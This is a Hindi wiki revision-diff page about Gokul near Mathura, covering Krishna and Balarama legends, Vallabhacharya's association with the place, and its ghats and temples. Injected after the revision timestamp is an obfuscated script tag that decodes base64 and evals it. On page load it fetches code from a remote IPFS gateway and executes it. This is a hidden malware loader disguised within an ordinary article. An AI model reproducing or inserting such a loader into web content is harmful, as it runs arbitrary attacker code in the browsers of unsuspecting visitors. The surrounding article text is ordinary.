"गोकुल" के अवतरणों में अंतर

ब्रज डिस्कवरी, एक मुक्त ज्ञानकोष से
नेविगेशन पर जाएँ खोज पर जाएँ
पंक्ति ३: पंक्ति ३:
 
==गोकुल / Gokul==
 
==गोकुल / Gokul==
 
[[category:धार्मिक स्थल]]
 
[[category:धार्मिक स्थल]]
 +
[[चित्र:gokul-ghat.jpg|गोकुल घाट|thumb|250px]]
 
यह स्थल [[मथुरा]] से 15 किमी की दूरी पर [[यमुना]] के पार स्थित है । यह वैष्णव तीर्थ है । यथार्थ में [[महावन]] और गोकुल एक ही है। [[नन्द]]बाबा अपने परिजनों को लेकर [[नन्दगाँव]] से वृहद्वन या महावन में बस गये।  गो, गोप, [[गोपी]] आदि का समूह वास करने के कारण महावन को ही गोकुल कहा गया है।  नन्दबाबा के समय गोकुल नाम का कोई पृथक रूप में गाँव या नगर नहीं था।  यथार्थ में यह गोकुल आधुनिक बस्ती है। यहाँ पर नन्दबाबा की गऊओं का खिड़क था।  आज से लगभग पाँच सौ पच्चीस वर्ष पहले श्री[[चैतन्य महाप्रभु]] के [[ब्रज]] आगमन के पश्चात श्री[[वल्लभाचार्य]] ने [[यमुना]] के इस मनोहर तट पर [[भागवत पुराण|श्रीमद्भागवत]] का पारायण किया था।  इनके पुत्र श्री[[विट्ठलाचार्य]] और उनके पुत्र श्री[[गोकुलनाथ]]जी की बैठकें भी यहाँ पर है।  असल में श्रीविट्ठलनाथ जी ने [[औरंगजेब]] को चमत्कार दिखला कर इस स्थान का अपने नाम पर पट्टा लिया था।  उन्होंने ही इस गोकुल को बसाया।  उनके पश्चात श्रीगोकुलनाथ के पुत्र, परिवारों के सहित इस गोकुल में ही रहते थे।  श्रीवल्लभकुल के गोस्वामी गोकुल में ही रहते थे।  उन्होंने यहाँ पर मथुरेशजी , विट्ठलनाथ जी, द्वारिकाधीश जी, गोकुलचन्द्रमा जी, बालकृष्ण जी तथा श्रीमदनमोहन जी के श्रीविग्रहों को प्रतिष्ठा की थी। बाद में श्रीमथुरेश जी कोटा, श्रीविट्ठलनाथ जी नाथद्वारा, श्रीद्वारिकाधीश जी कांकरौली, गोकुलचन्द्रमा जी [[काम्यवन|कामवन]], श्रीबालकृष्ण जी सूरत और मदनमोहन जी कामवन पधार गये।  श्रीवल्लभकुल के गोस्वामी गोकुल में रहने के कारण गोकुलिया गोस्वामी के नाम से प्रसिद्ध हैं।  विश्वास किया जाता है कि भगवान [[कृष्ण]] ने यहाँ गौएँ चरायी थीं ।  कहा जाता है, श्री कृष्ण के पालक पिता [[नन्द]]जी का यहाँ गोष्ठ था ।  संप्रति वल्लभाचार्य, उनके पुत्र गुसाँई बिट्ठलनाथ जी एवं गोकुलनाथजी को बैठकें है । मुख्य मन्दिर गोकुलनाथ जी का है । यहाँ वल्लभकुल के चौबीस मन्दिर बतलाये जाते हैं । महालिंगेश्वर तन्त्र में शिवशतनाम स्तोत्र के अनुसार महादेव गोपीश्वर का यह स्थान है:
 
यह स्थल [[मथुरा]] से 15 किमी की दूरी पर [[यमुना]] के पार स्थित है । यह वैष्णव तीर्थ है । यथार्थ में [[महावन]] और गोकुल एक ही है। [[नन्द]]बाबा अपने परिजनों को लेकर [[नन्दगाँव]] से वृहद्वन या महावन में बस गये।  गो, गोप, [[गोपी]] आदि का समूह वास करने के कारण महावन को ही गोकुल कहा गया है।  नन्दबाबा के समय गोकुल नाम का कोई पृथक रूप में गाँव या नगर नहीं था।  यथार्थ में यह गोकुल आधुनिक बस्ती है। यहाँ पर नन्दबाबा की गऊओं का खिड़क था।  आज से लगभग पाँच सौ पच्चीस वर्ष पहले श्री[[चैतन्य महाप्रभु]] के [[ब्रज]] आगमन के पश्चात श्री[[वल्लभाचार्य]] ने [[यमुना]] के इस मनोहर तट पर [[भागवत पुराण|श्रीमद्भागवत]] का पारायण किया था।  इनके पुत्र श्री[[विट्ठलाचार्य]] और उनके पुत्र श्री[[गोकुलनाथ]]जी की बैठकें भी यहाँ पर है।  असल में श्रीविट्ठलनाथ जी ने [[औरंगजेब]] को चमत्कार दिखला कर इस स्थान का अपने नाम पर पट्टा लिया था।  उन्होंने ही इस गोकुल को बसाया।  उनके पश्चात श्रीगोकुलनाथ के पुत्र, परिवारों के सहित इस गोकुल में ही रहते थे।  श्रीवल्लभकुल के गोस्वामी गोकुल में ही रहते थे।  उन्होंने यहाँ पर मथुरेशजी , विट्ठलनाथ जी, द्वारिकाधीश जी, गोकुलचन्द्रमा जी, बालकृष्ण जी तथा श्रीमदनमोहन जी के श्रीविग्रहों को प्रतिष्ठा की थी। बाद में श्रीमथुरेश जी कोटा, श्रीविट्ठलनाथ जी नाथद्वारा, श्रीद्वारिकाधीश जी कांकरौली, गोकुलचन्द्रमा जी [[काम्यवन|कामवन]], श्रीबालकृष्ण जी सूरत और मदनमोहन जी कामवन पधार गये।  श्रीवल्लभकुल के गोस्वामी गोकुल में रहने के कारण गोकुलिया गोस्वामी के नाम से प्रसिद्ध हैं।  विश्वास किया जाता है कि भगवान [[कृष्ण]] ने यहाँ गौएँ चरायी थीं ।  कहा जाता है, श्री कृष्ण के पालक पिता [[नन्द]]जी का यहाँ गोष्ठ था ।  संप्रति वल्लभाचार्य, उनके पुत्र गुसाँई बिट्ठलनाथ जी एवं गोकुलनाथजी को बैठकें है । मुख्य मन्दिर गोकुलनाथ जी का है । यहाँ वल्लभकुल के चौबीस मन्दिर बतलाये जाते हैं । महालिंगेश्वर तन्त्र में शिवशतनाम स्तोत्र के अनुसार महादेव गोपीश्वर का यह स्थान है:
  
 
गोकुले गोपिनीपूज्यो गोपीश्वर इतीरित: ।
 
गोकुले गोपिनीपूज्यो गोपीश्वर इतीरित: ।
 
----
 
----
[[चित्र:gokul-ghat.jpg|गोकुल घाट|thumb|250px]]
+
 
 
यह [[ब्रज]] का बहुत महत्वपूर्ण स्थल है । यहीं पर [[रोहिणी]] ने [[बलराम]] को जन्म दिया था । बलराम [[देवकी]] के सातवें गर्भ में थे जिन्हें योगमाया ने आकर्षित करके रोहिणी के गर्भ में डाल दिया था । मथुरा में [[कृष्ण]]  के जन्म के बाद [[कंस]] के सभी सैनिकों को नींद आ गयी और वासुदेव की बेड़ियाँ खुल गयी थीं । तब वासुदेव कृष्ण को गोकुल में नन्दराय के यहाँ छोड़ आये थे । नन्दराय जी के घर लाला का जन्म हुआ है, धीरे धीरे यह बात गोकुल में फैल गयी । सभी गोपगण, [[गोपी|गोपियाँ]], गोकुलवासी खुशियाँ मनाने लगे । सभी घर, गलियाँ चौक आदि सजाये जाने लगे और बधाइयाँ गायी जाने लगीं । कृष्ण और बलराम का पालन पोषण यही हुआ और दोनों अपनी लीलाओं से सभी का मन मोहते रहे । घुटनों के बल चलते हुए दोनों भाई को देखना गोकुलवासियों को सुख देता था, वहीं माखन चुराकर कृष्ण ब्रज की गोपिकाओं के दुखों को हर लेते थे । गोपियाँ कृष्ण जी को छाछ और माखन का लालच देकर नचाती थीं तो कृष्ण जी बांसुरी की धुन से सभी को मंत्र मुग्ध कर देते थे । कृष्ण ने गोकुल में रहते हुए [[पूतना-वध|पूतना]], [[शकटासुर वध|शकटासुर]], [[तृणावर्त]] आदि असुरों को मोक्ष प्रदान किया । गोकुल से आगे २ किमी. दूर [[महावन]] है । लोग इसे पुरानी गोकुल कहते हैं । यहाँ चौरासी खम्भों का मन्दिर, नन्देश्वर महादेव, मथुरा नाथ, द्वारिका नाथ आदि मन्दिर हैं।
 
यह [[ब्रज]] का बहुत महत्वपूर्ण स्थल है । यहीं पर [[रोहिणी]] ने [[बलराम]] को जन्म दिया था । बलराम [[देवकी]] के सातवें गर्भ में थे जिन्हें योगमाया ने आकर्षित करके रोहिणी के गर्भ में डाल दिया था । मथुरा में [[कृष्ण]]  के जन्म के बाद [[कंस]] के सभी सैनिकों को नींद आ गयी और वासुदेव की बेड़ियाँ खुल गयी थीं । तब वासुदेव कृष्ण को गोकुल में नन्दराय के यहाँ छोड़ आये थे । नन्दराय जी के घर लाला का जन्म हुआ है, धीरे धीरे यह बात गोकुल में फैल गयी । सभी गोपगण, [[गोपी|गोपियाँ]], गोकुलवासी खुशियाँ मनाने लगे । सभी घर, गलियाँ चौक आदि सजाये जाने लगे और बधाइयाँ गायी जाने लगीं । कृष्ण और बलराम का पालन पोषण यही हुआ और दोनों अपनी लीलाओं से सभी का मन मोहते रहे । घुटनों के बल चलते हुए दोनों भाई को देखना गोकुलवासियों को सुख देता था, वहीं माखन चुराकर कृष्ण ब्रज की गोपिकाओं के दुखों को हर लेते थे । गोपियाँ कृष्ण जी को छाछ और माखन का लालच देकर नचाती थीं तो कृष्ण जी बांसुरी की धुन से सभी को मंत्र मुग्ध कर देते थे । कृष्ण ने गोकुल में रहते हुए [[पूतना-वध|पूतना]], [[शकटासुर वध|शकटासुर]], [[तृणावर्त]] आदि असुरों को मोक्ष प्रदान किया । गोकुल से आगे २ किमी. दूर [[महावन]] है । लोग इसे पुरानी गोकुल कहते हैं । यहाँ चौरासी खम्भों का मन्दिर, नन्देश्वर महादेव, मथुरा नाथ, द्वारिका नाथ आदि मन्दिर हैं।
 
==दर्शनीय स्थान==
 
==दर्शनीय स्थान==
पंक्ति १४: पंक्ति १५:
 
==गोविन्द घाट==
 
==गोविन्द घाट==
 
श्रीवल्लभाचार्यजी जब [[ब्रज]] में आये, तब यमुना के इस घाट का दर्शन कर बड़े आकर्षित हुए।  उन्होंने बड़े-बूढ़े ब्रजवासियों से सुना कि पास ही नन्दबाबा की खिड़क थी और यह घाट जहाँ वह बैठे हैं, वह घाट गोविन्द घाट के नाम से विख्यात है। श्रीवल्लभाचार्यजी उस स्थान का दर्शन कर इतने प्रभावित हुए कि उन्होंने इस घाट पर शमीवृक्ष के नीचे [[भागवत पुराण|श्रीमद्भागवत]] का सप्ताह-पारायण किया।  
 
श्रीवल्लभाचार्यजी जब [[ब्रज]] में आये, तब यमुना के इस घाट का दर्शन कर बड़े आकर्षित हुए।  उन्होंने बड़े-बूढ़े ब्रजवासियों से सुना कि पास ही नन्दबाबा की खिड़क थी और यह घाट जहाँ वह बैठे हैं, वह घाट गोविन्द घाट के नाम से विख्यात है। श्रीवल्लभाचार्यजी उस स्थान का दर्शन कर इतने प्रभावित हुए कि उन्होंने इस घाट पर शमीवृक्ष के नीचे [[भागवत पुराण|श्रीमद्भागवत]] का सप्ताह-पारायण किया।  
 +
[[चित्र:Gokul-Ghat-2.jpg|गोकुल घाट|thumb|250px|left]]
 
इसके अतिरिक्त यहाँ-
 
इसके अतिरिक्त यहाँ-
 
*गोकुलनाथजी का बाग,  
 
*गोकुलनाथजी का बाग,  

१०:३५, ५ सितम्बर २००९ का अवतरण

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

गोकुल / Gokul

गोकुल घाट

यह स्थल मथुरा से 15 किमी की दूरी पर यमुना के पार स्थित है । यह वैष्णव तीर्थ है । यथार्थ में महावन और गोकुल एक ही है। नन्दबाबा अपने परिजनों को लेकर नन्दगाँव से वृहद्वन या महावन में बस गये। गो, गोप, गोपी आदि का समूह वास करने के कारण महावन को ही गोकुल कहा गया है। नन्दबाबा के समय गोकुल नाम का कोई पृथक रूप में गाँव या नगर नहीं था। यथार्थ में यह गोकुल आधुनिक बस्ती है। यहाँ पर नन्दबाबा की गऊओं का खिड़क था। आज से लगभग पाँच सौ पच्चीस वर्ष पहले श्रीचैतन्य महाप्रभु के ब्रज आगमन के पश्चात श्रीवल्लभाचार्य ने यमुना के इस मनोहर तट पर श्रीमद्भागवत का पारायण किया था। इनके पुत्र श्रीविट्ठलाचार्य और उनके पुत्र श्रीगोकुलनाथजी की बैठकें भी यहाँ पर है। असल में श्रीविट्ठलनाथ जी ने औरंगजेब को चमत्कार दिखला कर इस स्थान का अपने नाम पर पट्टा लिया था। उन्होंने ही इस गोकुल को बसाया। उनके पश्चात श्रीगोकुलनाथ के पुत्र, परिवारों के सहित इस गोकुल में ही रहते थे। श्रीवल्लभकुल के गोस्वामी गोकुल में ही रहते थे। उन्होंने यहाँ पर मथुरेशजी , विट्ठलनाथ जी, द्वारिकाधीश जी, गोकुलचन्द्रमा जी, बालकृष्ण जी तथा श्रीमदनमोहन जी के श्रीविग्रहों को प्रतिष्ठा की थी। बाद में श्रीमथुरेश जी कोटा, श्रीविट्ठलनाथ जी नाथद्वारा, श्रीद्वारिकाधीश जी कांकरौली, गोकुलचन्द्रमा जी कामवन, श्रीबालकृष्ण जी सूरत और मदनमोहन जी कामवन पधार गये। श्रीवल्लभकुल के गोस्वामी गोकुल में रहने के कारण गोकुलिया गोस्वामी के नाम से प्रसिद्ध हैं। विश्वास किया जाता है कि भगवान कृष्ण ने यहाँ गौएँ चरायी थीं । कहा जाता है, श्री कृष्ण के पालक पिता नन्दजी का यहाँ गोष्ठ था । संप्रति वल्लभाचार्य, उनके पुत्र गुसाँई बिट्ठलनाथ जी एवं गोकुलनाथजी को बैठकें है । मुख्य मन्दिर गोकुलनाथ जी का है । यहाँ वल्लभकुल के चौबीस मन्दिर बतलाये जाते हैं । महालिंगेश्वर तन्त्र में शिवशतनाम स्तोत्र के अनुसार महादेव गोपीश्वर का यह स्थान है:

गोकुले गोपिनीपूज्यो गोपीश्वर इतीरित: ।


यह ब्रज का बहुत महत्वपूर्ण स्थल है । यहीं पर रोहिणी ने बलराम को जन्म दिया था । बलराम देवकी के सातवें गर्भ में थे जिन्हें योगमाया ने आकर्षित करके रोहिणी के गर्भ में डाल दिया था । मथुरा में कृष्ण के जन्म के बाद कंस के सभी सैनिकों को नींद आ गयी और वासुदेव की बेड़ियाँ खुल गयी थीं । तब वासुदेव कृष्ण को गोकुल में नन्दराय के यहाँ छोड़ आये थे । नन्दराय जी के घर लाला का जन्म हुआ है, धीरे धीरे यह बात गोकुल में फैल गयी । सभी गोपगण, गोपियाँ, गोकुलवासी खुशियाँ मनाने लगे । सभी घर, गलियाँ चौक आदि सजाये जाने लगे और बधाइयाँ गायी जाने लगीं । कृष्ण और बलराम का पालन पोषण यही हुआ और दोनों अपनी लीलाओं से सभी का मन मोहते रहे । घुटनों के बल चलते हुए दोनों भाई को देखना गोकुलवासियों को सुख देता था, वहीं माखन चुराकर कृष्ण ब्रज की गोपिकाओं के दुखों को हर लेते थे । गोपियाँ कृष्ण जी को छाछ और माखन का लालच देकर नचाती थीं तो कृष्ण जी बांसुरी की धुन से सभी को मंत्र मुग्ध कर देते थे । कृष्ण ने गोकुल में रहते हुए पूतना, शकटासुर, तृणावर्त आदि असुरों को मोक्ष प्रदान किया । गोकुल से आगे २ किमी. दूर महावन है । लोग इसे पुरानी गोकुल कहते हैं । यहाँ चौरासी खम्भों का मन्दिर, नन्देश्वर महादेव, मथुरा नाथ, द्वारिका नाथ आदि मन्दिर हैं।

दर्शनीय स्थान

श्रीठाकुरानीघाट

गोकुल का यह मुख्य घाट है। श्रीवल्लभाचार्य जी को यहीं पर श्रीयमुना महारानी का दर्शन प्राप्त हुआ थां उन्होंने यहीं पर सर्वप्रथम दीक्षा देना आरम्भ किया। इसलिए वल्लभ संप्रदाय के वैष्णवों के लिए यह घाट बहुत ही महत्वपूर्ण स्थान है।

गोविन्द घाट

श्रीवल्लभाचार्यजी जब ब्रज में आये, तब यमुना के इस घाट का दर्शन कर बड़े आकर्षित हुए। उन्होंने बड़े-बूढ़े ब्रजवासियों से सुना कि पास ही नन्दबाबा की खिड़क थी और यह घाट जहाँ वह बैठे हैं, वह घाट गोविन्द घाट के नाम से विख्यात है। श्रीवल्लभाचार्यजी उस स्थान का दर्शन कर इतने प्रभावित हुए कि उन्होंने इस घाट पर शमीवृक्ष के नीचे श्रीमद्भागवत का सप्ताह-पारायण किया।

गोकुल घाट

इसके अतिरिक्त यहाँ-

  • गोकुलनाथजी का बाग,
  • बाजनटीला,
  • सिंहपौड़ी,
  • यशोदाघाट,
  • श्रीविट्ठलनाथ जी का मन्दिर,
  • श्रीमदनमोहन जी का मन्दिर,
  • श्रीमाधवराय जी का मन्दिर,
  • श्रीगोकुलनाथ जी का मन्दिर,
  • श्रीनवनीतप्रिय जी का मन्दिर,
  • श्रीद्वारकानाथजी का मन्दिर,
  • ब्रह्मछोकरा वृक्ष,
  • श्रीगोकुलचन्द्रमाजी का मन्दिर,
  • श्रीमथुरानाथजी का मन्दिर तथा
  • श्रीनन्दमहाराज जी के छकड़ा रखने आदि स्थान दर्शनीय हैं। गोकुल के सामने यमुना के उसपार नौरंगाबाद गाँव है। उसमें श्रीगंगा जी का मन्दिर तथा दूसरे दर्शनीय स्थान हैं।